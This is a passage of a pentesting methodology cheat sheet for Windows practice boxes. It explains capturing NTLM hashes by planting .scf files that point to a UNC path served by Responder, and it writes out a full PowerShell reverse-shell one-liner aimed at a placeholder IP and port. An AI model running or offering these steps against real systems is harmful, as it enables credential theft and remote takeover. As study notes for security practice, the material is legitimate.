AlienX2001/methodology-boxes/windows-enum.md

+## exploiting UNC paths to get NTLM hash
+To get NTLM hashes are to somehow get an authenticated connection back to us, there by giving us hashes
+1. One of of doing it is to somehow upload .scf files to the machine.
+SCF files are command files which containt very limited amount of windows explorer commands, which does not need any user interaction, and gets executed the moment a user opens the directory which contains the .scf file.
+So hence we can specify a UNC path to connect to and set up an smb server using responder, this will give us the NTLM hashes, because given a UNC path, windows thinks that it needs to authenticate to the remote machine, thereby giving away its hash.
+This attack was also prevelant in .lnk(shortcuts) files but was patched.
+More on this here https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/

 ## getting a reverse shell:-
 `powershell -c "$client = New-Object System.Net.Sockets.TCPClient("IP",PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"` (via powershell)<br />
 or<br />